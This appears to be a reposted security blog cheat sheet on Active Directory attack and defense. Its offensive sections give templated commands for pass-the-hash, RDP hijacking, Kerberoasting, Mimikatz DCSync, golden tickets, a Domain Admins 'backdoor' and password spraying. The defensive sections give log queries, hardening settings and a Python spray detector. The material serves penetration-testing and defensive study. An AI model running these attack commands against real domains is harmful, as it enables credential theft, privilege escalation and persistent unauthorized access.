Active Directory (AD) is the backbone of enterprise security, yet it remains a prime target for attackers. Whether you’re a penetration tester, red teamer, or defender, mastering AD security is crucial. Below is a comprehensive guide with practical commands, techniques, and defensive measures.
🔗 Reference: Active Directory Security Guide
You Should Know: AD Security Commands & Techniques
1. Enumeration – Finding AD Weaknesses
- PowerShell Command:
Get-ADUser -Filter * -Properties * | Select-Object Name, SamAccountName, UserPrincipalName, Enabled
- LDAP Query:
ldapsearch -x -h <DC_IP> -D "<user>@<domain>" -w "<password>" -b "dc=<domain>,dc=com" "(objectClass=user)"
- BloodHound (Tool for AD Mapping):
sudo neo4j start && bloodhound
2. Lateral Movement – Spreading Access
- Pass-the-Hash (PTH) Attack:
crackmapexec smb <target_IP> -u <user> -H <NTLM_hash> --local-auth
- RDP Hijacking:
tscon <session_ID> /dest:rdp-tcp<new_session>
3. Privilege Escalation – Gaining Admin Rights
- Kerberoasting Attack:
GetUserSPNs.py -request -dc-ip <DC_IP> <domain>/<user>
- DCSync Attack (Mimikatz):
lsadump::dcsync /domain:<domain> /user:Administrator
4. Persistence – Staying Undetected
- Golden Ticket Attack:
kerberos::golden /user:Administrator /domain:<domain> /sid:<SID> /krbtgt:<KRBTGT_Hash> /ptt
- Shadow Admin (Hidden Backdoor):
Add-ADGroupMember "Domain Admins" "<user>" -Verbose
5. Defense – Securing & Monitoring AD
- Detecting Anomalies with Windows Event Logs:
Get-WinEvent -LogName Security | Where-Object { $_.ID -eq 4624 -or $_.ID -eq 4672 }
- Enabling LSA Protection (Against Mimikatz):
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL /t REG_DWORD /d 1 /f
- Blocking NTLM (Prevent Relay Attacks):
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0" -Name "NTLMMinServerSec" -Value 537395200
What Undercode Say
Active Directory remains a critical attack surface in enterprise networks. Attackers leverage misconfigurations, weak credentials, and excessive privileges to compromise domains. Defenders must:
– Monitor logs for suspicious logins (Event ID 4624, 4625).
– Disable legacy protocols (NTLM, SMBv1).
– Implement least privilege (Restrict Domain Admin access).
– Use tools like BloodHound to visualize attack paths.
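As an added example (not code from the original post), the two detections the defense section and the list above call for, run over constructed sample Security-log records instead of a live Get-WinEvent query: a password-spray shape in 4625 failures, and 4624 logons that received special privileges (4672) for accounts outside a known-admin baseline. The field names, the sample events and the KNOWN_ADMINS baseline are assumptions made for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real log data): the Security-log fields that matter here,
# i.e. EventID, TimeCreated, TargetUserName, IpAddress and the logon ID that links a
# 4624 (successful logon) to its 4672 (special privileges assigned to new logon).
SAMPLE_EVENTS = [
    {"id": 4625, "time": "2024-05-01T09:00:01", "user": "alice", "src": "10.0.0.5"},
    {"id": 4625, "time": "2024-05-01T09:00:02", "user": "bob", "src": "10.0.0.5"},
    {"id": 4625, "time": "2024-05-01T09:00:03", "user": "carol", "src": "10.0.0.5"},
    {"id": 4625, "time": "2024-05-01T09:00:04", "user": "dave", "src": "10.0.0.5"},
    {"id": 4625, "time": "2024-05-01T09:00:05", "user": "erin", "src": "10.0.0.5"},
    {"id": 4625, "time": "2024-05-01T09:30:00", "user": "alice", "src": "10.0.0.7"},  # a lone typo
    {"id": 4624, "time": "2024-05-01T09:05:00", "user": "Administrator", "src": "10.0.0.2", "logon_id": "0x1A2B"},
    {"id": 4672, "time": "2024-05-01T09:05:00", "user": "Administrator", "logon_id": "0x1A2B"},
    {"id": 4624, "time": "2024-05-01T09:06:10", "user": "svc-backup", "src": "10.0.0.9", "logon_id": "0x3E7A"},
    {"id": 4672, "time": "2024-05-01T09:06:10", "user": "svc-backup", "logon_id": "0x3E7A"},
]
KNOWN_ADMINS = {"administrator"}  # constructed baseline of accounts expected to hold admin rights


def detect_spray(events, window_s=60, min_accounts=5):
    """Return {source_ip: distinct_accounts} for sources whose 4625 failures hit at least
    min_accounts different accounts inside any window_s-second window. One source, many
    accounts, few attempts each is the password-spray shape, not a user mistyping."""
    fails = defaultdict(list)
    for e in events:
        if e["id"] == 4625:
            fails[e["src"]].append((datetime.fromisoformat(e["time"]), e["user"].lower()))
    hits = {}
    for src, attempts in fails.items():
        attempts.sort()
        for i, (start, _) in enumerate(attempts):
            users = {u for t, u in attempts[i:] if t - start <= timedelta(seconds=window_s)}
            if len(users) >= min_accounts:
                hits[src] = len(users)
                break
    return hits


def detect_unexpected_admin_logons(events, known_admins=KNOWN_ADMINS):
    """Return accounts that received special privileges (4672) on a logon (4624) but are not
    in the known-admin baseline. The join is on the logon ID (TargetLogonId in 4624,
    SubjectLogonId in 4672), which is reliable; matching on timestamps alone is not."""
    privileged_ids = {e["logon_id"] for e in events if e["id"] == 4672}
    return sorted({e["user"] for e in events
                   if e["id"] == 4624 and e["logon_id"] in privileged_ids
                   and e["user"].lower() not in known_admins})
```

Feed it the output of the Get-WinEvent filter from section 5 (with 4625 added to the ID list) exported to JSON, and tune window_s and min_accounts to the domain's normal failure rate before alerting on it.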
Bonus Linux Commands for AD Testing:
- Impacket (Python-based AD Exploitation):
python3 GetADUsers.py -dc-ip <DC_IP> <domain>/<user> -all
- CrackMapExec (Network Exploitation):
crackmapexec smb <IP_Range> -u <userlist> -p <passlist>
Expected Output: A hardened AD environment with reduced attack surface, continuous monitoring, and mitigated lateral movement risks.
🔗 Further Reading: Medium on AD Security
References:
Reported By: Alexrweyemamu Active – Hackers Feeds